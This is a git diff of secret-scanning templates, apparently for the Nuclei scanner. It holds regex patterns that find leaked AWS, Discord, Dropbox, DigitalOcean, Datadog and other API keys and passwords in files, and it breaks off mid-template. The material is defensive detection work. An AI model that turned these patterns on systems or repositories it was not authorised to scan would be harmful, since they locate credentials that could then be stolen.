"(?i)[\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?browserstack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?browser[_-]?stack[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?pass[_-]?prod[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bluemix[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintraykey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?gpg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?bintray[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?b2[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?b2[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awscn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awscn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?awsaccesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?config[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?config[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aws[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?author[_-]?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?author[_-]?email[_-]?addr[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?auth0[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?auth0[_-]?api[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?assistant[_-]?iam[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?artifactory[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?argos[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?apple[_-]?id[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?appclientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?secrete[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?report[_-]?token[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?app[_-]?bucket[_-]?perm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?apigw[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?apiary[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aos[_-]?sec[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?aos[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ansible[_-]?vault[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?android[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?anaconda[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?amazon[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?amazon[_-]?bucket[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?alicloud[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?alicloud[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?alias[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?search[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?search[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?search[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?search[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']" - - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" diff --git a/file/keys/credentials.yaml b/file/keys/credentials.yaml index 1c7e110e0a..04403dfb9e 100644 --- a/file/keys/credentials.yaml +++ b/file/keys/credentials.yaml @@ -1,11 +1,15 @@ id: basic-auth-creds info: - name: Basic Auth Credentials + name: Basic Authorization Credentials Check author: gaurang severity: high + description: Basic authorization credentials check was conducted. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 tags: token,file,auth - file: - extensions: - all @@ -14,3 +18,6 @@ file: - type: regex regex: - "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]" + +# Enhanced by md on 2023/05/04 +# digest: 490a00463044022047ac843e01beb8081ec8ac903054e8a1a83c078cc6d0256a26d8e07e1a2020cc0220473634c6bb17dfffaa8a60273107bbdda3e3fa05afbea2a7d07d6b1e9ae069fd:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/databricks-api-token.yaml b/file/keys/databricks-api-token.yaml new file mode 100644 index 0000000000..c952a2efe2 --- /dev/null +++ b/file/keys/databricks-api-token.yaml @@ -0,0 +1,23 @@ +id: databricks-api-token + +info: + name: Databricks API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go + metadata: + verified: true + tags: databricks,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 490a0046304402205a9ba473b766da44beaf1a11f5ba3b4b5a28772d6783635afee40e0fef1d326402202c2dd7732505cc546389db97d03e0a151d8a7cd0721aa510f97365e436dfcefe:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/datadog-access-token.yaml b/file/keys/datadog-access-token.yaml new file mode 100644 index 0000000000..95f9a864ef --- /dev/null +++ b/file/keys/datadog-access-token.yaml @@ -0,0 +1,23 @@ +id: datadog-access-token + +info: + name: Datadog Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go + metadata: + verified: true + tags: datadog,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100ac811651a03d1176fea6e7b025bff473bf3175aa05af8e3b9f041d8d909ecc3e022100fffcf374f843c2ba08ae7dd41de52c00e7b6b492950ce852469569b24425ca28:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/digitalocean/digitalocean-access-token.yaml b/file/keys/digitalocean/digitalocean-access-token.yaml index 713e1b0122..858f2ac379 100644 --- a/file/keys/digitalocean/digitalocean-access-token.yaml +++ b/file/keys/digitalocean/digitalocean-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: digitalocean,file,token - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - (?i)\b(doo_v1_[a-f0-9]{64})\b \ No newline at end of file + - (?i)\b(doo_v1_[a-f0-9]{64})\b + +# digest: 4b0a00483046022100858d2cff4b452e35180468a6695191f9d1ae08ca70b8ca90b7e28bdbec1fdbeb022100a3be26c4c317526ccadda313039c98db82cbfd3cb1597ae24a12609797fda9d1:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/digitalocean/digitalocean-personal-access.yaml b/file/keys/digitalocean/digitalocean-personal-access.yaml index 6065498782..3d3e0e6465 100644 --- a/file/keys/digitalocean/digitalocean-personal-access.yaml +++ b/file/keys/digitalocean/digitalocean-personal-access.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: digitalocean,file,token - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - (?i)\b(dop_v1_[a-f0-9]{64})\b \ No newline at end of file + - (?i)\b(dop_v1_[a-f0-9]{64})\b + +# digest: 4a0a00473045022100dcb8aaa82d6aefd3b01408d72a296c75c1deaff5819db85c822b7e45bff6d77202201b15ceff0eba81cd1f09340c78185fc750e7be78bc4af44b07714afd0aaae9f5:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/digitalocean/digitalocean-refresh-token.yaml b/file/keys/digitalocean/digitalocean-refresh-token.yaml index c2c6abaaff..0b8960a2a4 100644 --- a/file/keys/digitalocean/digitalocean-refresh-token.yaml +++ b/file/keys/digitalocean/digitalocean-refresh-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: digitalocean,file,token - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - (?i)\b(dor_v1_[a-f0-9]{64})\b \ No newline at end of file + - (?i)\b(dor_v1_[a-f0-9]{64})\b + +# digest: 4b0a00483046022100931591d2a2069a31daa58995279b2782b0afada6a2220bec853c5bec6c1d3aa80221008c1a3f9aae96d9e07ec0a4f409d91db3236b9abd6a0d1c4ed51926f0798fd27b:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/discord/discord-api-token.yaml b/file/keys/discord/discord-api-token.yaml new file mode 100644 index 0000000000..a305718d25 --- /dev/null +++ b/file/keys/discord/discord-api-token.yaml @@ -0,0 +1,23 @@ +id: discord-api-token + +info: + name: Discord API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go + metadata: + verified: true + tags: discord,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022036aba4243305e0c7ebf0fc10d5881e524ab82a68415015798b9baaed8bafc6bf022100dfb1277553666c29673cba6499260d5842e0d71c0c24a0ea77fe4ba20c3d2485:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/discord/discord-cilent-secret.yaml b/file/keys/discord/discord-cilent-secret.yaml new file mode 100644 index 0000000000..5013223aef --- /dev/null +++ b/file/keys/discord/discord-cilent-secret.yaml @@ -0,0 +1,23 @@ +id: discord-client-secret + +info: + name: Discord Client Secret + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go + metadata: + verified: true + tags: discord,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100da6c23c3fcf97b042569585276fdcab7635947ffb0cf6f2d5dae1d48fb38812902202f06f8d8203daf1529f43a2173ffff1eb112f78c8035a49e3aa138d67b1bbb26:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/discord/discord-client-id.yaml b/file/keys/discord/discord-client-id.yaml new file mode 100644 index 0000000000..c6a543bea7 --- /dev/null +++ b/file/keys/discord/discord-client-id.yaml @@ -0,0 +1,23 @@ +id: discord-client-id + +info: + name: Discord Client ID + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go + metadata: + verified: true + tags: discord,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022014da9d0f239f7d501553ac906b9054714870fc2312887ed490cc59b2ba5ca2ee0221008b6f010727658b75178680fcea57746f49e27803292485eee7af6de904db741d:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/doppler-api-token.yaml b/file/keys/doppler-api-token.yaml new file mode 100644 index 0000000000..18023a9325 --- /dev/null +++ b/file/keys/doppler-api-token.yaml @@ -0,0 +1,23 @@ +id: doppler-api-token + +info: + name: Doppler API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go + metadata: + verified: true + tags: doppler,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (dp\.pt\.)(?i)[a-z0-9]{43} + +# digest: 4a0a00473045022100b2a2e381643bd58d5119d60f1d018236dfc1179b88a8b3ade4480203a20f6030022040ccc01d0b0a46a8bec160a13e28500a01ff4819d3a8191340ac75f5a34019bc:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/droneci-access-token.yaml b/file/keys/droneci-access-token.yaml new file mode 100644 index 0000000000..2ce8ae2ae3 --- /dev/null +++ b/file/keys/droneci-access-token.yaml @@ -0,0 +1,23 @@ +id: droneci-access-token + +info: + name: Droneci Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go + metadata: + verified: true + tags: droneci,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100b8462a9771be5c8665ee990dc19becef729131b0e4057a0c817db0a567eee60a02205e9fdf219adc3b3157067c8cf82dc5e7e209e8bfde68c29fea2455c878255176:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/dropbox/dropbox-api-token.yaml b/file/keys/dropbox/dropbox-api-token.yaml new file mode 100644 index 0000000000..85fd6f48af --- /dev/null +++ b/file/keys/dropbox/dropbox-api-token.yaml @@ -0,0 +1,23 @@ +id: dropbox-api-token + +info: + name: Dropbox API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go + metadata: + verified: true + tags: dropbox,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022019bc488cb0a89a175bc3e928235f20bddc23095cea36a7710ad2178514467f28022100dbc59db66b17230f8573e8f9327e703cc7f3d20487cce343b7c7ba765b13e26d:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/dropbox/dropbox-longlived-token.yaml b/file/keys/dropbox/dropbox-longlived-token.yaml new file mode 100644 index 0000000000..f7c74c2af0 --- /dev/null +++ b/file/keys/dropbox/dropbox-longlived-token.yaml @@ -0,0 +1,23 @@ +id: dropbox-longlived-token + +info: + name: Dropbox Long Lived API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go + metadata: + verified: true + tags: dropbox,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\-_=]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100ee9fa7d0912714a6b869f837f02095f6227cdb2267a2eba99a85ffbfc40891d3022100e1a8fe58ff358521d3164330dcd414e337b0c3fb3e07179874db247be79a19b0:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/dropbox/dropbox-shortlived-token.yaml b/file/keys/dropbox/dropbox-shortlived-token.yaml new file mode 100644 index 0000000000..43205541b0 --- /dev/null +++ b/file/keys/dropbox/dropbox-shortlived-token.yaml @@ -0,0 +1,23 @@ +id: dropbox-shortlived-token + +info: + name: Dropbox Short Lived API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go + metadata: + verified: true + tags: dropbox,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(sl\.[a-z0-9\-=_]{135})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100c6c63fb125dd56aac1691499be2236b6becd898dd20d76cc881c41482f591d5102210099593df2de5ea00a2ac6d85321ee740126acbc19f6e6fc1e64e98dc4b1570544:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/duffel-api-token.yaml b/file/keys/duffel-api-token.yaml new file mode 100644 index 0000000000..cef0586d9d --- /dev/null +++ b/file/keys/duffel-api-token.yaml @@ -0,0 +1,23 @@ +id: duffel-api-token + +info: + name: Duffel API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go + metadata: + verified: true + tags: duffel,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - duffel_(test|live)_(?i)[a-z0-9_\-=]{43} + +# digest: 4a0a0047304502203925d102f1ecf4a1ab5bc21956688eb03c28f835d9c8b41781d13593db964918022100bbfd6f603c25b50ff692d1c4f2b197e173f3d3337d1f6e8bde9002b39b57bbaf:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/dynatrace-token.yaml b/file/keys/dynatrace-token.yaml index 3ad533dd3f..d795c227d0 100644 --- a/file/keys/dynatrace-token.yaml +++ b/file/keys/dynatrace-token.yaml @@ -1,11 +1,15 @@ id: dynatrace-token info: - name: Dynatrace Token + name: Dynatrace Token - Detect author: gaurang severity: high + description: Dynatrace token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 tags: token,file - file: - extensions: - all @@ -13,4 +17,7 @@ file: extractors: - type: regex regex: - - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" \ No newline at end of file + - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" + +# Enhanced by md on 2023/05/04 +# digest: 4b0a00483046022100c174b97b5872754d6ef09bf07cf91d3e04546e4f32bcb15a0bfeaf6b8b5200a2022100c89a70958e16a0a7a9491f9c428e390fbc7254a52658880fc073360df1658144:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/easypost/easypost-api-token.yaml b/file/keys/easypost/easypost-api-token.yaml new file mode 100644 index 0000000000..b655d7ecd1 --- /dev/null +++ b/file/keys/easypost/easypost-api-token.yaml @@ -0,0 +1,23 @@ +id: easypost-api-token + +info: + name: Easypost Test API Token + author: 